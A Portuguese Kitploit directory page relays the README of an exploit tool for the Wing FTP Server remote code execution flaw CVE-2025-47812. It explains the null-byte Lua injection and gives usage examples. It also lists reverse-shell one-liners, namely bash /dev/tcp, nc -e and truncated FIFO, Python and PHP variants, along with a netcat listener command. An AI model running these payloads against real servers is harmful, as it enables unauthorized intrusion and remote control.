Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-47812 — Exploit de execução remota de código não autenticado para Wing FTP Server < 7.4.4, permitindo execução de comandos e reverse shells via injeção de Lua em arquivos de sessão. | Kitploit
Ferramentas/GitHubGitHub/blindma1den/cve-2025-47812
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoRed TeamingFerramenta de Acesso Remoto
GitHubblindma1den/cve-2025-47812

CVE-2025-47812

Exploit de execução remota de código não autenticado para Wing FTP Server < 7.4.4, permitindo execução de comandos e reverse shells via injeção de Lua em arquivos de sessão.

17há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Ver Repositório
Compartilhar

CVE-2025-47812 - Execução Remota de Código (RCE) no Wing FTP Server

===========================================================

Autor: blindma1den

Data: Julho de 2025

Tipo de Exploit: Execução Remota de Código (Não Autenticado)

Alvo: Wing FTP Server < 7.4.4

Pontuação CVSS: 10.0 (Crítico)


DESCRIÇÃO

Este script explora o CVE-2025-47812, uma vulnerabilidade crítica na interface web do Wing FTP Server que permite a atacantes remotos executar comandos arbitrários do sistema ou abrir uma reverse shell sem autenticação.

A falha é causada pelo tratamento inadequado de bytes nulos (%00) no formulário de login (/loginok.html). Isso permite injeção de código Lua em arquivos de sessão, que posteriormente são avaliados quando endpoints como /dir.html são acessados.


FONTES

Descrição NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-47812


FUNCIONALIDADES

  • Execução de comandos (ex.: whoami, uname -a)
  • Múltiplos payloads de reverse shell
  • Extrai automaticamente o cookie de sessão UID
  • Implementação limpa e modular em Python 3

REQUISITOS

  • Python 3.7+
  • Módulo requests

Instale as dependências:

pip install requests

USO

Execute o script:

python3 wingftp_rce_exploit.py

Você será solicitado a fornecer:

  • URL alvo (ex.: http://127.0.0.1:5466)
  • Nome de usuário (padrão: anonymous)
  • Modo de exploit: [1] Executar um comando [2] Iniciar reverse shell

EXEMPLOS

[1] EXECUTAR COMANDO:

Target URL: http://192.168.1.10:5466
Username: anonymous
Your choice (1 or 2): 1
Command to execute (default: whoami): whoami

[2] REVERSE SHELL:

Target URL: http://192.168.1.10:5466
Username: anonymous
Your choice (1 or 2): 2
Reverse shell IP address: 192.168.1.100
Reverse shell port: 4444

Inicie seu listener antes de acionar a shell:

nc -lvnp 4444

PAYLOADS UTILIZADOS (REVERSE SHELL)

Bash: bash -i >& /dev/tcp/IP/PORT 0>&1

Python3: python3 -c 'import socket,subprocess,os; ...'

Netcat: nc IP PORT -e /bin/sh

PHP: php -r '$sock=fsockopen("IP",PORT); ...'

FIFO + Netcat: rm /tmp/f; mkfifo /tmp/f; cat /tmp/f|/bin/sh -i ...


AVISO LEGAL

Este código é apenas para fins educacionais. NÃO utilize este exploit contra sistemas que você não possui ou para os quais não tenha autorização explícita para testar. O uso não autorizado é ilegal e antiético.

Atualize seus sistemas imediatamente. O Wing FTP Server 7.4.4 corrige esta vulnerabilidade.

Feliz hacking!

Baixar ferramenta